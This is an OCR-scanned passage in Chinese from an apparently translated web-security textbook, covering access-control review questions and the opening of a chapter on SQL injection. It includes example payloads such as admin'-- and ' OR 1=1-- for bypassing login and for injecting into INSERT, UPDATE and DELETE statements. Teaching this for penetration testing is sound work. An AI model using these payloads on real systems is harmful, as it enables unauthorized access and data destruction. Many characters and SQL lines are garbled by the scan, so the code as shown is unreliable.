得 很 大 成 效 ， 但 仍然 可 以 使 用 其 他 可 能 的 攻击 手段 。 更 重要 的 是 ， 
了 解 每 种 控制 在 它 所 能 提供 的 保护 方面 存在 的 限制 ， 将 有 助 于 确定 
最 可 能 影响 到 它 的 漏洞 。 
口 应 用 程序 层面 的 编程 检查 易于 受到 注入 类 攻击 。 
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口 即使 使 用 低 权 限 操作 系统 账户 运行 应 用 程序 组 件 ， 这 些 账户 
通常 仍然 能 够 阅读 主机 文件 系统 中 保存 的 各 种 敏感 数据 。 任 何 准许 
他 人 访问 任意 文件 的 漏洞 即使 仅仅 读 取 敏感 数据 ) 都 可 被 攻击 者 
加 以 有 效 利 用 。 

口 应 用 程序 服务 器 软件 本 喘 存 在 的 漏洞 往往 有 助 于 突破 应 用 程 
0 

口 在 适当 位 置 的 一 个 可 供 利 用 的 访问 控制 漏洞 可 成 为 发 动 重大 
权限 提升 攻击 的 起 点 。 例如， 如 果 能 够 修改 与 账户 有 天 的 角色 ， 那 
ee 
限 。 


8.4 小结 


访问 控制 缺陷 可 能 以 各 种 形式 表现 出 来 。 有 些 时 候 ， 它 们 可 能 3 
没有 利用 价值 ， 允 许 访问 不 能 进一步 提升 权限 的 “无 害 ” 功 能 。 其 他 情 
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造成 访问 控制 缺陷 的 来 源 各 异 : 设计 精 糕 的 应 用 程序 很 难 或 无 法 
难 测 出 未 授权 访问 ， 一 个 简单 的 足 忽 可 能 会 使 一 两 项 功能 未 受到 保 
护 ， 或 者 对 用 户 行为 的 错误 假设 也 可 能 会 给 应 用 程序 造成 防御 漏洞 。 

许多 时 候 ， 突 破 访 问 控 制 非常 容易 ， 只 需 请 求 一 个 常用 的 管理 
URL 就 可 以 直接 访问 相关 功能 。 但 是 ， 有 时 突破 访问 控制 也 可 能 非常 
困难 ， 一 些 细微 的 缺陷 可 能 在 应 用 程序 之 中 隐 泸 得 较 深 ， 特 别 是 在 复 
杂 、 高 度 安 全 的 应 用 程序 中 。“ 四 处 查看 ”是 攻击 访问 控制 的 最 有 效 方 
法 。 如 果 想 努力 取得 进展 ， 渗 透 测 试 员 应 该 耐心 测试 应 用 程序 的 每 一 
项 功能 ， 也 许 不 久 束 可 以 发 现 一 个 能 攻破 整个 应 用 程序 的 缺陷 。 


8.5 [A 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 一 个 应 用 程序 可 能 通过 使 用 HTTP Referer 消 息 头 实施 访问 控 
制 ， 但 它 的 正常 行为 并 没有 公开 表露 这 一 点 。 如 何 检 测 出 这 种 缺陷? 
(2) 登录 一 个 应 用 程序 后 ， 被 重 定向 到 以 下 URL: 
https://wahh-app.com/MyAccount.php?uid=1241126841 
应 用 程序 似乎 辐 MyAccount.php 页 面 提交 一 个 用 户 标 识 特 。 已 知 的 
唯一 标识 符 是 目 己 的 标识 符 。 如 何 测试 应 用 程序 是 否 使 用 这 个 参数 以 
不 安全 的 方式 实施 访问 控制 ? 
(3) 因特网 上 的 一 个 Web 应 用 程序 通过 检查 用 户 的 来 源 IP 地 址 实 
施 访问 控制 。 为 什么 这 种 行为 可 能 存在 缺陷 ? 
(4) 某 应 用 程序 的 唯一 目的 是 为 公众 提供 可 搜索 的 信息 仓库 。 该 
o 该 应 用 程序 应 执行 何 种 
访问 控制 ? 
(5) 在 浏览 一 个 应 用 程序 的 过 程 中 过 到 几 个 应 防止 未 授权 访问 的 
敏感 资源 ， 它 们 的 文件 扩展 名 为 .xls。 这 种 情况 为 何 应 立 即 引 起 注意 ? 


第 9 章 
攻击 数据 存储 区 


几乎 所 有 应 用 程序 都 依赖 数据 存储 区 来 管理 在 应 用 程序 中 处 理 的 
数据 。 在 许多 情况 下 ， 这 些 数据 负责 处 理 核心 应 用 程序 逻辑 、 保 存 用 
户 账户 、 权 限 、 应 用 程序 配置 设置 等 。 现 在 ， 数 据 存 储 区 已 不 再 只 是 
被 动 的 数据 容器 。 大 多 数 数据 存储 区 都 保存 有 结构 化 、 可 以 使 用 预先 
ee 
E o 


通常 ， 应 用 程序 使 用 常用 的 权限 级 别 来 管理 对 数据 存储 区 的 各 种 
访问 操作 ， 以 及 处 理 属 于 不 同 应 用 程序 用 户 的 数据 。 如 果 攻 击 者 能 够 
破坏 应 用 程序 与 数据 存储 区 的 交互 ， 使 应 用 程序 检索 或 修改 各 种 数 
人 
|| o 

上 述 原 则 适用 于 任何 类 型 的 数据 存储 技术 。 因 为 本 书 是 一 本 实用 
手册 ， 我 们 将 主要 讨论 利用 现实 世界 的 应 用 程序 中 存在 的 漏洞 时 所 需 
的 知识 和 技巧 。 迄 今 为 止 最 常用 的 数据 存储 区 是 SQL 数据 库 、 基 于 
XML 的 资料 库 、LDAP 目 录 ， 以 及 一 些 常见 的 示例 。 

在 讨论 这 些 主要 示例 时 ， 我 们 将 介绍 你 在 确定 并 利用 这 些 缺 陷 时 
可 以 采取 的 实用 步骤 。 每 一 种 新 型 注入 攻击 都 需要 结合 概念 加 以 理 
解 。 掌 握 利 用 这 些 缺 陷 的 基础 知识 后 ， 如 果 再 遇 到 一 种 新 型 注入 攻 
击 ， 你 就 能 够 自信 地 应 用 这 些 知 识 ， 设 计 出 其 他 攻击 方法 ， 向 其 他 人 
已 经 研究 过 的 漏洞 发 动 攻击 。 


9.1 注入 解释 型 语言 


解释 型 语言 (interpreted language) 是 一 种 在 运行 时 由 一 个 运行 时 
组 件 (runtime component) 解释 语言 代码 并 执行 其 中 包含 的 指令 的 语 
言 。 与 之 相对 ， 编 译 型 语言 (compiled language) 是 这 样 一 种 语言 : 
它 的 代码 在 生成 时 转换 成 机 需 指 令 ， 然 后 在 运行 时 直接 由 使 用 该 语言 
的 计算 机 处 理 器 执行 这 些 指令 。 

从 理论 上 说 ， 任 何 语言 都 可 使 用 编译 絮 或 解释 器 来 执行 ， 这 种 区 
别 并 不 是 语言 本 号 的 内 在 特性 。 但 是 ， 通 常 大 多 数 语言 仅 通 过 上 述 其 
中 一 种 方式 执行 ， 开 发 Web 应 用 程序 使 用 的 许多 核心 语言 使 用 解释 需 
执行 ， 包 括 SQL、LDAP、Perl 和 PHP ° 

基于 解释 型 语言 的 执行 方式 ， 产 生 了 一 系列 叫做 代码 注入 (code 
injection) 的 漏洞。 任何 有 实际 用 途 的 应 用 程序 都 会 收 到 用 户 提交 的 数 
据 ， 对 其 进行 处 理 并 执行 相应 的 控 作 。 因 此 ， 由 解释 絮 处 理 的 数据 实 
际 上 是 由 程序 员 编 写 的 代码 和 用 户 提 区 的 数据 共同 组 成 的 。 有些 时 
候 ， 攻 击 者 可 以 提交 专门 设计 的 输入 ， 通 常 提交 某 个 在 应 用 程序 中 使 
用 解释 型 语言 语法 的 具有 特殊 意义 的 句法 ， 同 应 用 程序 实施 攻击 。 结 
果 ， 这 个 输入 的 一 部 分 被 解释 成 程序 指令 执行 ， 好 像 它们 是 由 最 初 的 
程序 员 编 写 的 代码 一 样 。 因 此 ， 如 果 这 种 攻击 取得 成 功 ， 它 将 完全 攻 
破 目 标 应 用 程序 的 组 件 。 

男 一 方面 ， 在 编译 型 语言 中 实施 虽 在 执行 任意 命令 的 攻击 往往 非 
常 困难。 这 时 ， 注 入 代码 的 方法 通常 并 不 利用 开发 目标 程序 所 使 用 语 
言 的 任何 语法 特性 ， 注 入 的 有 效 载 何 为 机 器 代码 ， 而 不 是 用 那 种 语言 
编写 的 指令 。 请 参阅 第 16 章 了 解 各 种 针对 编译 软件 的 常见 攻击 。 


避 开 登录 


无 论 访问 操作 是 由 普通 用 户 还 古 应 用 程序 管理 员 触 发 ， 应 用 程序 
访问 数据 存储 区 的 过 程 都 大 致 相同 。Web 应 用 程序 对 数据 存储 区 实施 
目 主 访问 控制 ， 构 造 碍 询 基 于 用 户 的 账户 和 类 型 来 检索 、 诡 加 或 修改 
数据 存储 区 中 的 数据 。 修 改 查询 (不 只 是 查询 中 的 数据 ) 的 成 功 注 入 
攻击 可 以 避 开 应 用 程序 的 自主 访问 控制 并 获取 未 授权 访问 。 

如 果 需 要 安全 保护 的 应 用 程序 逻辑 由 查询 结 来 控制 ， 攻 击 者 束 可 
以 通过 修改 查询 来 更 改 应 用 程序 的 逻辑 。 举 一 个 典型 的 例子 一 一 在 后 


端 数据 存 储 区 的 用 户 表 中 查询 与 用 户 提供 的 证 书 匹配 的 记录 。 许 多 实 
施 基 于 表单 的 登录 功能 的 应 用 程序 使 用 数据 库 来 存储 用 户 证 书 ， 并 执 
行 简 单 的 SQL 查 询 来 确认 每 次 登录 笑 试 。 以 下 是 一 个 典型 的 示例 : 


SELECT * FROM users WHERE username sword = ， 


这 个 查询 要 求 数据 库 检 查 用 户 表 中 的 每 一 行 ， 提 取出 每 条 
username 列 值 为 marcus、password 列 值 为 secret 的 记录 。 如 果 应 用 程序 
收 到 一 名 用 户 的 资料 ， 登 录 和 尝试 将 取得 成 功 ， 应 用 程序 将 为 该 用 户 建 
立 一 个 通过 验证 的 会 话 。 

在 这 种 情况 下 ， 攻 击 者 可 注入 用 户 名 或 密码 字段 ， 以 修改 应 用 程 
序 执行 的 查询 ， 从 而 破坏 它 的 逻辑 。 例 如 ， 如 采 攻 击 者 知道 应 用 程序 
管理 员 的 用 户 名 为 admin， 那 么 他 就 可 以 通过 提交 以 下 用 户 名 和 任意 密 
码 ， 以 管理 员 身 份 登录 : 


admin' 
应 用 程序 将 执行 以 下 查询 : 
SELECT * FROM users WHERE username = 'admin'--' AND password = 'foo' 


因为 其 中 使 用 了 注释 符号 (--) ， 上 面 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = ‘admin' 


尝试 访问 


http://mdsec.net/auth/319/ 


假如 攻击 者 不 知道 管理 员 的 用 户 名 ， 该 如 何 实施 攻击 昵 ? 在 大 多 
数 应 用 程序 中 ， 数 据 库 的 第 一 个 账户 为 管理 用 户 ， 因 为 这 个 账 尸 通 千 
手工 创建 ， 然 后 再 通过 它 生 成 其 他 应 用 程序 账户 。 而 且 ， 如 有 果 查 询 返 
回 几 名 用 户 的 资料 ， 许 多 应 用 程序 只 会 处 理 第 一 名 用 户 。 因 此 ， 攻 击 
i tal ase eng ole 
身价 登录. 


"RL 


应 用 程序 将 执行 以 下 查询 : 


SBLEC * FROM users WHERE username = '' OR 1=1 ' AND password = ‘foo’ 
因为 其 中 使 用 了 注释 符号 ， 上 面 的 查询 等 同 于 : 
SELECT * FROM users WHERE username = '' OR 1=1 


该 查询 将 返回 全 部 应 用 程序 用 户 的 资料 。 


T 注解 注入 解释 型 语言 来 更 改 应 用 程序 逻辑 是 一 种 常用 的 


攻击 技巧 。LDAP 查 询 、XPath 查 询 、 消 息 序列 实施 或 任何 定制 的 查 
询 语言 中 都 可 能 出 现 对 应 的 漏洞 。 


渗透 测试 步骤 


解释 型 语言 注入 是 一 个 非常 宽泛 的 主题 ,涵盖 许 多 不 同 种 类 的 
漏洞 ， 并 可 能 影响 Web 应 用 程序 支持 基础 架构 中 的 每 一 个 组 件 。 检 
测 并 利用 代码 注入 缺陷 的 详细 步骤 取决 于 攻击 所 针对 的 是 何 种 语 
言 ， 以 及 应 用 程序 开发 者 使 用 了 什么 编程 技巧 。 但 也 有 一 些 适 用 于 
各 种 情形 的 常规 方法 ， 如 下 所 示 。 

(1) 提交 可 能 在 解释 型 语言 中 引发 问题 的 无 效 语法 。 
(2) 确定 应 用 程序 响应 中 可 能 表示 存在 代码 注入 漏洞 的 任何 


反常 现象 。 

(3) 如 果 收 到 任何 错误 消息 ， 分 析 这 些 消息 ， 获 得 与 服务 器 
上 发 生 的 问题 有 关 的 证 据 。 

(4) 如 有 必要 ， 系 统 性 地 修改 初始 输入 ， 尝 试 确定 或 否定 最 
初 假 设 的 漏洞 诊断 。 

(5) 构造 一 个 概念 验证 测试 (proof-of-concept test) ， 使 安全 
命令 以 可 证 实 的 方式 执行 ， 得 出 结论 以 证 明 应 用 程序 中 存在 一 个 可 
被 利用 的 代码 注入 漏洞 。 

3 (6) 利用 目标 语言 和 组 件 的 功能 实现 攻击 目标 ， 对 漏洞 加 以 
|H o 


9.2 ”注入 SQL 


几乎 每 一 个 Web 应 用 程序 都 使 用 数据 库 来 保存 操作 所 需 的 各 种 信 
o 例如， 网 上 零售 商 所 用 的 Web 应 用 程序 使 用 数据 库 保 存 以 下 信 


口 用 户 账 户 、 证 书 和 个 人 信息 ; 

口 所 销售 商品 的 介绍 与 价格 ; 

口 订 单 、 账 单 和 文 付 细 克 ; 

口 每 名 应 用 程序 用 户 的 权限 。 

数据 库 中 的 信息 通过 SQL (Structured Query Language， 结 构 化 查 
访问 。SQL 可 用 于 读 取 、 更 新 、 增 加 或 删除 数据 库 中 保存 的 

SQL 是 一 种 解释 型 语言 ，Web 应 用 程序 经 常 建立 合并 用 户 提交 的 
数据 的 SQL 语句 。 因 此 ， 如 果 建 立 语句 的 方法 不 安全 ， 那 么 应 用 程序 
可 能 易于 受到 SQL 注入 攻击 。 这 种 缺陷 是 困扰 Web 应 用 程序 的 最 具名 
昭著 的 漏洞 之 一 。 在 最 严重 的 情形 中 ， 匿 名 攻击 者 可 利用 SQL 注入 读 
取 并 修改 数据 库 中 保存 的 所 有 数据 ， 甚 至 完全 控制 运行 数据 库 的 服务 
2% o 

随 着 Web 应 用 程序 安全 意识 的 日 渐 增 强 ，SQL 注 入 漏洞 越 来 越 
少 ， 同 时 也 变 得 更 加 难以 检测 与 利用 。 许 多 主流 应 用 程序 采用 API 来 
避免 $SQL 注 入， 如 果 使 用 得 当 ， 这 些 API 能 够 有 效 阻 止 SQL 注入 攻击 。 
在 这 些 情 况 下 ， 通 常 只 有 在 无 法 应 用 这 些 防御 机 制 时 ，SQL 注 入 才 会 
发 生 。 有 时 ， 查 找 SQL 注 入 漏洞 是 一 项 艰难 的 任务 ， 需 要 测试 员 坚 持 
不 懈 地 在 应 用 程序 中 探查 一 两 个 无 法 应 用 常规 控制 的 实例 。 

随 着 这 种 趋势 的 变化 ， 查 找 并 利用 SQL 注入 漏洞 的 方法 也 在 不 断 
改进 ， 通 常 使 用 更 加 微妙 的 漏洞 指标 以 及 更 加 完善 与 强大 的 利用 技 
| eee 然后 进一步 描述 最 新 的 育 目 检测 与 

j 用 技巧 。 

有 大 量 广泛 的 数据 库 可 为 Web 应 用 程序 提供 文 持 。 虽 然 对 绝 大 多 
数 数据 库 而 言 ，SQL 注 入 的 基本 原理 大 体 相 似 ， 但 它们 之 间 也 存在 着 
许多 差异 ， 包 括 语 法 上 的 细微 变化 以 及 可 能 影响 攻击 者 所 使 用 的 攻击 
类 型 的 巨大 行为 与 功能 差异 。 受 篇 由 和 个 人 经 验 所 限 ， 在 下 面 的 示例 
中 ， 我 们 仅 讨论 3 种 最 常用 的 数据 库 ， 即 Oracle、MS-SQL 和 MySQL ° 
在 适当 的 情况 下 ， 我 们 将 主要 讨论 这 3 种 平台 之 间 的 区 别 。 掌 握 这 些 技 


ET 5 亚 


术 后 ， 就 可 以 通过 其 他 一 些 研究 ， 迅 速 确定 并 利用 任何 其 他 数据 库 中 
的 SQL 注入 漏洞 。 


Vo fem 许多 时 候 ， 访 问 和 目标 应 用 程序 所 使 用 数据 库 相 同 
的 、 在 本 地 安 流 的 数据 库 会 有 极 大 帮助 。 通 常 ， 只 需 修 改 一 个 语法 
或 者 参考 一 个 内 置 表 或 功能 束 可 实现 目 己 的 目的 。 从 目标 应 用 程序 
收 到 的 啊 应 一 般 并 不 完整 或 者 含义 模糊 ， 需 要 猜测 才能 理解 。 如 果 


能 交叉 参考 相同 数据 库 的 一 个 完全 “透明 ”运行 的 版 本 ， 理 解 起 来 就 
容易 得 多 。 
如 果 这 种 方法 不 可 行 ， 最 好 找 一 个 可 以 进行 测试 的 适当 交 
互 式 在 线 环境 ， 如 SQLzoo.net 中 的 交互 式 在 线 教程 。 


下 面 以 一 个 书籍 零售 商 使 用 的 Web 应 用 程序 为 例 ， 该 应 用 程序 允 
许 用 户 根据 作者 、 书 名 、 出 版 商 等 信息 搜索 产品 。 完 整 的 书籍 目 永保 
存在 数据 库 中 ， 应 用 程序 使 用 SQL 查询 、 根 据 用 户 提交 的 搜索 项 获取 
各 种 书籍 的 信息 。 

当 一 名 用 户 搜索 由 Wiley 出 版 的 所 有 书籍 时 ， 应 用 程序 执行 以 下 查 


询 : 


SELECT author,title, year FROM books WHERE publisher = ‘Wiley' and 

该 查询 要 求 数 据 库 检 查 书籍 表 的 第 一 行 ， 提 取 每 条 publisher 列 为 
Wiley 值 的 记录 ， 并 返回 所 有 这 些 记 录 。 然 后 应 用 程序 处 理 这 组 记录 ， 
并 通过 一 个 HTML 页 面 将 结果 显示 给 用 户 。 

在 这 个 查询 中 ， 等 号 左边 的 词 由 SQL 关键 字 、 表 和 数据 库 列 名 称 
构成 。 这 个 部 分 的 全 部 内 容 由 程序 员 在 创建 应 用 程序 时 建立 。 当然 ， 
表达 式 Wiley 由 用 户 提交 ， 它 是 一 个 数据 项 。SQL 碍 询 中 的 字符 串 数 据 
必须 包含 在 单 引号 内 ， 与 查询 的 其 他 内 容 分 隔 开 来 。 

现在 思考 一 下 ， 如 果 用 户 搜 索 所 有 由 O'Reilly 出 版 的 书籍 ， 会 出 现 
什么 情况 。 应 用 程序 将 执行 以 下 查询 : 


SELECT author,title,ycars FROM books WHERE publisher = 'O'Reilly' and 
uhplisned=1 


在 这 个 示例 中 ， 查 询 解释 器 以 和 前 面 一 个 示例 相同 的 方式 到 达 子 
符 串 数据 位 置 。 它 解析 这 个 包含 在 单 引号 中 的 数据 ， 得 到 值 0。 然 后 
遇 到 表达 式 Reilly'， 这 并 不 是 有 效 的 SQL 语法 ， 因 此 应 用 程序 生成 一 条 
fe DH Ja: 


Incorrect syntax near 'Reilly'. 
Server: Msg 105, Level 15, State 1, Line 1 


Unclosed quotation mark before the character string ' 


如 果 应 用 程序 以 这 种 方式 运行 ， 那 么 它 非 常 容易 遭 到 SQL 注入 。 
攻击 者 可 提交 包含 引号 的 输入 终止 他 控制 的 字符 串 ， 然 后 编写 任意 的 
SQL 修改 开发 者 想 要 应 用 程序 执行 的 查询 。 例 如 ， 在 这 个 示例 中 ， 攻 
二 者 可 以 对 走 询 流行 修改 ， 通 过 输入 以 下 搜索 项 ， 返 回 夫 售 商 目录 中 
1 每 一 本 书籍 。 


Wiley' OR 1=1-- 
应 用 程序 将 执行 以 下 查询 : 
SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 
=] ' and publishec=1 
这 个 查询 对 开发 者 查询 中 的 WHERE 子 名 进行 修改 ， 增 加 了 另外 
一 个 条 件 。 数 据 库 将 检查 书籍 表 的 每 一 行 ， 提 取 publisher 列 值 为 Wiley 
或 其 中 1 等 于 1 的 每 条 记录 。 因 为 1 总 是 等 于 1， 所 以 数据 库 将 返回 书籍 
表 中 的 所 有 记录 。 
攻击 者 的 输入 中 的 双 连 字符 在 SQL 中 征 一 个 有 意义 的 表达 式 ， 瑟 
告诉 查询 解释 种 该 行 的 其 他 部 分 属于 注释 ， 应 被 名 略 。 在 一 些 SQL 注 
入 攻击 中 ， 这 种 技巧 极其 重要 ， 因 为 它 允 许 忽 略 由 应 用 程序 开发 者 建 
立 的 查询 的 剩余 部 分 。 在 上 面 的 示例 中 ， 应 用 程序 将 用 户 提交 的 字符 
串 包含 在 单 引号 中 。 因 为 攻击 者 已 经 终止 他 控制 的 字符 串 并 注入 其 他 
一 些 SQL， 他 需要 人 处理 字符 串 末 尾部 分 的 引号 ， 避 人 免 出 现 和 O'Reilly 示 
例 中 相同 的 语法 错误 。 攻 击 者 通过 添加 一 个 双 连 字符 达到 这 一 目的 ， 
将 查询 的 剩余 部 分 以 注释 处 理 。 在 MySQL 中 ， 需 要 在 双 连 字符 后 加 入 
一 个 空格 ， 或 者 使 用 “护符 号 指定 注释 。 


原始 查询 还 将 访问 仅 限 于 已 出 版 的 书籍 ， 因 为 它 指定 and 
published=1。 通 过 注入 注释 序列 ， 攻 击 者 获得 未 授权 访问 权限 ， 可 以 
返回 所 有 书籍 (包括 已 出 版 及 其 他 书籍 ， 的 详细 信息 。 


YY ”提示 “有 些 时 候 ， 可 以 不 使 用 注释 符号 处 理 字符 串 末 尾 
分 的 引号 ， 而 用 一 个 需要 引号 包含 的 字符 第 数据 结束 注入 的 输入 ， 
以 此 “平衡 引号 ”。 例 如 ， 输 入 以 下 搜索 项 : 


wiley’ or 'a' = 'a 


将 生成 以 下 查询 : 


SELECT author,title,year FROM books WHERE publisher = ‘Wiley' OR 
'a'='a' and published=1 


这 个 查询 完全 有 效 ， 可 得 到 和 1=1 攻 击 相同 的 结果 。 


很 明显 ， 前 面 的 示例 不 会 造成 挛 重 的 安全 威胁 ， 因 为 用 户 使 用 完 
全 合法 的 方法 束 可 以 访问 全 部 书籍 信息 。 但 是， 稍 后 我 们 将 描述 如 何 
利用 这 种 SQL 注 入 漏洞 从 各 种 数据 库 表 中 提取 任何 数据 ， 并 提升 在 数 
据 库 和 数据 库 服 务 器 中 的 权限 。 为 此 ， 不 管 出 现在 哪个 应 用 程序 功能 
中 ,任何 SQL 注 入 漏洞 都 应 被 视 为 极其 产 重 的 威胁 。 


9.2.2 ”注入 不 同 的 语句 类 型 


SQL 语言 中 包含 许多 可 能 出 现在 语句 开头 的 动词 。 由 于 SELECT 
是 最 常用 的 动词 ， 因 此 绝 大 多 数 的 SQL 注入 漏洞 出 现在 这 种 语句 中 。 
的 确 ， 当 讨论 SQL 注入 时 ， 因 为 所 举 的 示例 全 部 属于 这 种 类 型 ， 所 以 
我 们 常常 会 产生 这 样 的 印象 ， 即 SQL 注入 漏洞 只 出 现在 SELECT 语句 
中 。 然 而 ， 任 何 类 型 的 语句 都 可 能 存在 SQL 缺陷 ， 必 须 了 解 一 些 与 其 
有 关 的 重要 问题 。 

当然 ， 当 与 一 个 远程 应 用 程序 交互 时 ， 通 常情 况 下 不 可 能 提前 知 
道 用 户 输 入 的 一 个 特殊 数据 项 将 由 哪 种 类 型 的 语 名 处理。 但是， 可 以 
ee ee ee 
名 及 其 用 法 。 


1. SELECT 语句 

SELECT 语 句 被 用 于 从 数据 库 中 获取 信息 。 它 们 常用 于 应 用 程序 
响应 用 户 操 作 而 返回 信息 的 功能 中 ， 如 浏览 一 个 产品 目录 、 查 看 一 名 
用 户 的 资料 或 者 进行 一 项 搜索 。 根 据 数据 库 中 的 数据 核对 用 户 提 交 的 
言 息 的 登录 功能 也 经 常 使 用 这 种 语句 。 

如 在 前 面 的 示例 中 说 明 的 ，SQL 注 入 攻击 的 进入 点 (entry point) 
通常 是 查询 中 的 WHERE 子 句 ， 它 将 用 户 提 交 的 数据 传送 给 数据 库 ， 
以 控制 查询 结果 的 范围 。 因 为 WHERE 子 名 一般 在 SELECT 语句 的 最 
后 ， 攻 击 者 就 可 以 使 用 注释 符号 将 查询 截 短 到 其 输入 的 结束 位 置 ， 而 

\ 会 使 整个 查询 的 语法 失效 。 

SQL 注入 漏洞 偶尔 也 会 影响 SELECT 查询 的 其 他 部 分 ， 如 ORDER 

BY 子 句 或 表 和 列 名 称 。 


尝试 访问 


http://mdsec.net/addressbook/32/ 


2. INSERT 语 名 
INSERT 语 句 用 于 在 表 中 建立 一 个 新 的 数据 行 。 应 用 程序 通常 使 用 
i 计 日 志 、 创 建 一 个 新 用 户 账户 或 生成 一 个 新 
订单 。 
例如 ， 如 果 一 个 应 用 程序 允许 用 户 自我 注册 ， 指 定 他 们 自己 的 用 
户 名 和 密码 ， 就 可 以 使 用 下 面 的 语句 将 用 户 资料 插入 users 表 中 。 
INSERT INTO users {username, password, ID, privs) VALUES [('daf', 


A 
‘secret', 2248, 


如 果 username 或 password 字 上段 存 在 SQL 注 入 漏洞 ， 那 么 攻击 者 就 可 
以 在 表 中 插入 任何 数据 ， 包 括 他 目 己 的 ID 和 privs 值 。 然 而 ， 要 想 这 样 
做 ， 攻 击 者 束 必 须 确保 VALUES 子 句 的 其 他 部 分 正常 运行 。 特 别 是 其 
中 数据 项 的 个 数 与 类 型 必须 正确 。 例 如 ， 当 注入 username 字 段 时 ， 攻 
击 者 可 以 提交 以 下 输入 : 


roo"; "“bar’, 3999, JJ- 


它 将 建立 一 个 ID 为 9999，Pprivs 为 0 的 账户 。 假 如 privs 字 段 用 来 决定 账 
户 权 限 ， 那 么 攻击 者 就 可 以 利用 它 创 建 一 个 管理 用 户 。 

有 了 时， 攻击 者 完全 盲目 地 注入 一 个 INSERT 语 句 也 能 够 从 应 用 程序 
中 提取 出 字符 串 数据 。 例 如 ， 攻 击 者 可 以 拦截 数据 库 的 版 本 字符 串 ， 
并 把 它 插 入 自己 用 户 资 料 的 一 个 字段 中 ， 正 常情 况 下 ， 浏 览 器 将 显示 
数据 库 的 版 本 信息 。 


Vv 提示 当 设 法 注入 一 个 INSERT 语 句 时 ， 可 能 无 法 提前 知道 
需要 提交 多 少 个 参数 或 参数 的 类 型 。 在 前 面 的 示例 中 ， 可 以 通过 在 


VALUES 子 句 中 持续 增加 一 个 新 的 字段 ， 直 到 应 用 程序 创建 了 确实 
想 要 的 用 户 账户 ， 从 而 解决 上 述 问 题 。 例 如 ， 当 注入 usemame 字 上 段 
上 时， 可 以 提交 以 下 输入 : 


Foo', 1, 1)-- 
Foo" Ty if Ep 

由 于 大 多 数 数据 库 都 会 隐 式 地 将 一 个 整数 转换 为 一 个 字符 串 ， 
可 以 在 每 个 位 置 都 使 用 一 个 整数 。 在 这 个 示例 中 ， 不 管 其 他 字段 如 
何 ， 它 将 生成 一 个 用 户 名 为 foo、 密 码 为 1 的 账户 。 

如 果 发 现 使 用 值 1 仍然 遭 到 拒绝 ， 可 以 尝试 使 用 值 2000， 许 多 
数据 库 也 会 隐 式 地 将 它 转 换 成 基于 数据 的 数据 类 型 。 

确定 注入 点 之 后 的 正确 字段 数 后 ， 在 MS-SQL 中 ， 测 试 员 可 以 
eee FER FA AS EES ao ESP RE ED) 

Tho 

在 Oracle 中 ， 则 可 以 在 insert 查 询 内 发 布 subselect 查 询 。 使 用 本 
章 后 面部 分 将 介绍 的 基于 推断 的 技巧 ， 该 subselect 碍 询 可 能 导致 主 
查询 成 功 或 失败 。 


尝试 访问 


http://mdsec.net/addressbook/12/ 


3. UPDATE 4) 

UPDATE 语 句 用 于 修改 表 中 的 一 行 或 几 行 数据 。 它 们 经 常用 在 用 
a 
了 ZN ER ° 

典型 UPDATE 语 名 的 运行 机 制 与 INSERT 语 名 类似 ， 只 是 UPDATE 
语句 中 通常 包含 一 个 VHERE 子 句 ， 告 诉 数据 库 更 新 表 中 哪些 行 的 数 
据 。 例 如 ， 当 用 户 修改 密码 时 ， 应 用 程序 可 能 会 执行 以 下 查询 : 


UPDATE users SET password='newsecret WHER user marcus’ anc passworc 


实际 上 ， 这 个 查询 首先 核实 用 户 的 现 有 密码 是 否 正确 ， 如 有 果 密 码 
无 误 ， 束 用 新 的 值 更 新 它 。 如 果 这 项 功能 存在 SQL 注 入 漏洞 ， 那 么 攻 
击 者 束 能 避 开 现 有 密码 检查 ， 通 过 输入 以 下 用 户 名 更 狐 管理 员 的 密 
Ag: 


admin'-- 


TZ 注解 由 于 无 法 提前 知道 应 用 程序 将 根据 专门 设计 的 输入 


执行 什么 操作 ， 因 此 ， 在 一 个 远程 应 用 程序 中 探查 SQL 注入 漏洞 往 

往 非 常 危 险 。 特 别 注意 ， 修 改 UPDATE 语 句 中 的 WHERE 子 句 可 能 会 
使 一 个 重要 的 数据 库 表 发 生 彻底 的 改变 。 例 如 ， 如 果 上 面 的 攻击 者 

之 前 已 经 提交 了 以 下 用 户 名 : 


amsi y l y | E 
admin' or 1=1 


那么 应 用 程序 可 能 会 执行 以 下 查询 : 


它 会 重新 设置 每 一 名 用 户 的 密码 ! 

即使 所 攻击 的 应 用 程序 功能 (如 主 登 录 功 能 ， 并 不 会 更 新 任何 
现 有 数据 ， 渗 透 测试 员 也 应 当 留 意 这 种 风险 。 有 时 候 ， 在 用 户 成 功 
登录 后 ， 应 用 程序 会 使 用 用 户 提 交 的 用 户 名 执行 各 种 UPDATE 查 
询 ， 这 意味 着 任何 针对 WHERE 子 句 的 攻击 可 能 会 “复制 ?到 其 他 语 
名 中 ， 给 所 有 应 用 程序 用 户 的 资料 造成 广 重 破坏 。 在 芝 试 探查 或 利 
用 任何 SQL 注入 漏洞 之 前 ， 必 须 确 保 应 用 程序 所 有 者 接受 这 些 无 法 


避免 的 风险 ;同时 ， 应 该 强烈 建议 他 们 在 开始 测试 前 对 数据 库 进 行 
完整 备份 。 


尝试 访问 


http://mdsec.net/addressbook/27/ 


4. DELETE 语 句 

DELETE 语 句 用 于 删除 表 中 的 一 行 或 几 行 数据 ， 例 如 用 户 从 他 们 
的 购物 得 中 删除 一 件 商 品 或 从 个 人 资料 中 删除 一 个 交 货 地 址 。 

与 UPDATE 语 名 一样 ，DELETE 语 句 通常 使 用 WHERE 子 句 告诉 数 
据 库 更 新 表 中 哪些 行 的 数据 ， 并 很 可 能 在 这 个 子 句 中 并 入 用 户 提 交 的 
数据 。 破 坏 正 常 运行 的 WHERE 子 句 可 能 会 造成 严重 的 后 果 ， 我 们 在 
UPDATE 语句 部 分 提出 的 警告 同样 适用 于 这 种 攻击 。 


9.2.3” 查 明 SQL 注 入 漏 ; 


在 最 明显 的 情形 中 ， 只 需 回应 用 程序 提 区 一 个 意外 输入 ， 束 可 以 
发 现 并 最 终 确 定 一 个 SQL 注入 漏洞 。 在 其 他 情况 下 ， 这 种 缺陷 可 能 非 
常 微妙 ， 很 难 与 其 他 类 型 的 漏洞 或 不 会 造成 安全 威胁 的 “ 民 性 ”异常 区 
ee 
入 漏洞 。 


T 注解 在 应 用 程序 解析 过 程 中 (请 参阅 第 4 章 ) ， 应 该 已 经 
